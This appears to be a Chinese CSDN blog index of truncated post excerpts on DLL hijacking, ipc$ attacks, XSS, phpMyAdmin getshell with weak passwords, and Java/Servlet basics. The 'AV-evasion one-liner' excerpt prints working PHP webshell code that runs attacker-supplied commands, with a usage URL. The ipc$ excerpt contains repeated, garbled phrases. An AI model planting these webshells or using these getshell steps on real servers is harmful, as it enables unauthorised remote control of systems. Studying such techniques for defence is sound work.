Blaov-CSDN博客

原创 DLL劫持

可执行文件运行时会经历以下步骤：第一步：Windows加载器会将PE(Portable Executable File Format)文件映射到内存中第二步：分析可执行文件的导入表，寻找执行文件所需要的DLL文件（因为导入表中只有DLL文件的名称，没有路径信息，因此有了第三步）第三步：按照第二步提供的DLL文件名称，Windows加载器在磁盘上搜索DLL文件，当前程序所在的目录（不会搜索父目录和子目录）->Windows系统目录->环境变量（按照这个顺序依次寻找DLL文件，一旦找到就停止寻

2021-07-18 22:49:01 896

原创 ipc$攻击

ipc$攻击使用条件: 1.开放了139、445端口 2.目标开启ipc$共享 3.获取用户账号密码向默认共享复制失败原因： 1.对方没开启默认共享，能建立ipc连接的主机不一定开启了默认共享，因而在建立完连接之后马上向c连接的主机不一定开启了默认共享，因而在建立完连接之后马上向c连接的主机不一定开启了默认共享，因而在建立完连接之后马上向c,d,admin,admin,admin之类的默认共享复制文件，一旦对方未开启默认共享，将导致复制失败。ipc连接成功只能说明对方打开了ipc连接成功只能说明对方打开了

2021-06-27 22:16:24 2607

原创从前端页面渲染了解xss的三种区别

渲染流程要想理解DOM型的xss首先得先了解前端页面的渲染过程。前端页面接收到服务器返回的html文档后，进行如下的操作。三种xss的区别先谈谈反射型xss与存储型xss。形成原因：都是因为服务器没有对用户的输入以及自身输出的数据进行检查、过滤。区别：它们区别是存储型xss会把数据存入数据库当中。而反射型xss是非持久化的。利用：例如存储型xss容易出现在留言板中，凡是浏览了此留言板都会受到xss攻击，大量用户cookie被窃取。而反射型xss一般容易出现在搜索页面，它是非持久化的，需要欺骗用

2021-03-28 11:02:47 1240

原创 phpmyadmin的getshell

在通过对目标进行信息收集探测后，当发现存有phpmyadmin目录（可试下：http://ip:端口/phpmyadmin/ ）时，进而通过弱口令（可以直接尝试下账号root密码root）或者暴力破解进入管理后台之后，有多种方法进行getshell。第一步：获得网站真实路径 1.执行select @@basedir; 这个语句是利用 Mysql 的特性，输出绝对路径。 2.phpinfo() 3.构造报错页面（页面访问报错，sql注入报错，文件

2021-03-25 11:14:46 247

原创免杀一句话

<?php array_map($_GET[func], array($_POST[cmd])); ?> 利用方式http://localhost/dvwa/hackable/uploads/nb.php?func=assert 密码为cmd ----------------------------------------------------------------------------------------- <?php $_GET['a']($_POST['b']);

2021-03-25 11:13:42 334

原创 git使用

git config --global user.name “名称” git config --global user.email “邮箱” git init(在项目文件中执行此命令，初始化项目，生成.git文件) git status(查看哪些文件在缓存区，哪些不在) gid add 文件名(提交文件到缓存区) git rm --cached 文件名(删除缓冲区中的文件) git add .(提交项目中的所有文件到缓存区) git commit -m “说明”(提交文件到本地仓库) git remote

2021-03-25 11:05:29 52

转载 linux共享文件

参考https://blog.csdn.net/kai1001/article/details/79668327

2021-01-16 22:24:21 65

原创基于RedHat7桥接模式的网卡配置

cd /etc/sysconfig/network-scripts/ vim ifcfg-eno16777736 HWADDR=00:0C:29:92:3A:D7 TYPE=Ethernet BOOTPROTO=static DEFROUTE=yes PEERDNS=yes PEERROUTES=yes IPV4_FAILURE_FATAL=no IPV6INIT=yes IPV6_AUTOCONF=yes IPV6_DEFROUTE=yes IPV6_PEERDNS=yes IPV6_PEERRO..

2021-01-16 22:11:20 485

原创静态代理与动态代理(含主要源码分析）

为什么要用代理? 假设让你在项目的所有类的方法中加入打印日志这段代码，如何在不修改已有代码的前提下，完成这个需求呢？这就需要用到代理了。静态代理：例如，如何在不修改代码前提下，在类hk中的print()方法中加入打印日志 public class hk { public void print(){ System.out.println("打印！"); } } 首先应实现一个接口 public interface abc { void print(); } public class hk

2020-08-05 20:15:06 146

原创 Servlet中的response

向response中写数据的两种方法：getOutputStream()，getWriter() 文件下载：图片认证： BufferedImage image = new BufferedImage(WIDTH,HEIGHT,TYPE_INT_RGB) Graphics g =image.getGraphics() setBackGround(g) //设置背景色 setBorder(g) //设置边框 drawRandomLine(g) //画干扰线 drawRandomNum((

2020-07-15 18:05:09 204

原创 Servlet中请求重定向与转发

请求重定向：一个WEB资源收到客户端请求后，通知客户端去访问另外一个web资源（特定场景才用，比如用户登入，购物车）特点：浏览器地址会发生变化。浏览器会向服务器发送两次请求，意味着有两个request/response response.setStatus(302) response.setHeader("location","/day06/1.html") 或 response.sendRedirect 转发：一个WEB资源收到客户端请求后，WEB资源帮客户端去访问另外一个web资源。特点：刷新则

2020-07-15 17:49:27 124

原创 Tomcat中虚拟目录映射

WEB应用一般放在Tomcat下的webapps中，服务器会自动生成虚拟目录映射，比如在webapps中放入day05文件，则浏览器访问 localhost:8080/day05就可以访问到了。具体WEB应用中的虚拟目录映射，就得在WEB-INF中的xml文件中配置。 ------------------------------------------------------------------------------------ 当WEB应用不在webapps中如何配置？比如服务器在D盘，想要访问C

2020-05-29 18:29:51 158

原创学习Servlet

Servlet其实就是一个遵循Servlet开发的java类。 Servlet运行过程：一：服务器检查是否有Servlet实例对象，有则执行第四步。二：首次访问Servlet时，创建Servlet实例对象。三：调用Servlet实例对象的init()方法初始化。四：服务器创建HttpServletRequest对象和HttpServletResponse对象并且调用Servlet实例对象的service()方法。五：服务器获取HttpServletResponse对象创建HTTP响应信息给客户端。

2020-05-29 18:25:34 108

weixin_45647970的博客